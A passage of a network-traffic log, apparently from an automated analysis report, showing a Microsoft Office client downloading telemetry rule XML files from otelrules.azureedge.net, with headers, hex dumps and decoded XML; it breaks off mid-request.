                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            102192.168.2.44985313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:51 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1952
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                            ETag: "0x8DC582B956B0F3D"
                                            x-ms-request-id: a3ba40ae-d01e-007a-0c16-37f38c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201652Z-164f84587bfh9nvdhC1DFWmce0000000044g00000000udcv
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            103192.168.2.44985413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:51 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 958
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                            ETag: "0x8DC582BA0A31B3B"
                                            x-ms-request-id: 11343522-e01e-0085-0240-36c311000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201651Z-16547b76f7fljddfhC1DFWeqbs000000071g00000000tmr2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            104192.168.2.44985613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:52 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2592
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                            ETag: "0x8DC582BB5B890DB"
                                            x-ms-request-id: eda1c5d7-201e-0033-2eb8-37b167000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201652Z-16547b76f7fhv4d5hC1DFW7h0n00000004pg00000000c86s
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            105192.168.2.44985513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:52 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 501
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                            ETag: "0x8DC582BACFDAACD"
                                            x-ms-request-id: 0f1e6d84-801e-007b-5baf-36e7ab000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201652Z-16547b76f7fr5rfnhC1DFW0am400000003p000000000ybzd
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            106192.168.2.44985713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:52 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 3342
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                            ETag: "0x8DC582B927E47E9"
                                            x-ms-request-id: 2d30c4d9-701e-003e-289a-3879b3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201652Z-164f84587bf9nk94hC1DFWerbg00000005dg000000000yfk
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            107192.168.2.44985813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:52 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:52 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:52 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2284
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                            ETag: "0x8DC582BCD58BEEE"
                                            x-ms-request-id: dd43ea10-201e-0003-39d2-37f85a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201652Z-1866b5c5fbb2ngs6hC1DFW402w00000004ng0000000009vw
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:52 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            108192.168.2.44985913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:53 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:53 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1393
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                            ETag: "0x8DC582BE3E55B6E"
                                            x-ms-request-id: 1c255c34-701e-0053-4dbc-373a0a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201653Z-1866b5c5fbbbf2bdhC1DFWu6f400000003ag00000000aer7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:53 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            109192.168.2.44986113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:53 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:53 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1393
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                            ETag: "0x8DC582BE39DFC9B"
                                            x-ms-request-id: 9c34710c-f01e-0071-6c8a-37431c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201653Z-164f84587bfjxw6fhC1DFWq94400000006g0000000004kz9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:53 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            110192.168.2.44986213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:53 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:53 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1356
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                            ETag: "0x8DC582BDF66E42D"
                                            x-ms-request-id: cd078e55-e01e-0020-52a2-37de90000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201653Z-164f84587bf5rpzqhC1DFWmra800000006ag00000000edb7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:53 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            111192.168.2.44986013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:53 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:53 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1356
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                            ETag: "0x8DC582BDC681E17"
                                            x-ms-request-id: 49ec1b40-d01e-00ad-43af-36e942000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201653Z-16547b76f7fd4rc5hC1DFWkzhw00000006hg00000000n3q1
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:53 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            112192.168.2.44986613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:54 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:54 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1358
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                            ETag: "0x8DC582BE022ECC5"
                                            x-ms-request-id: 99c36cd7-201e-0096-7ccd-37ace6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201654Z-1866b5c5fbbzzh8chC1DFWzc5c00000000hg00000000dysa
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            113192.168.2.44986513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:54 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
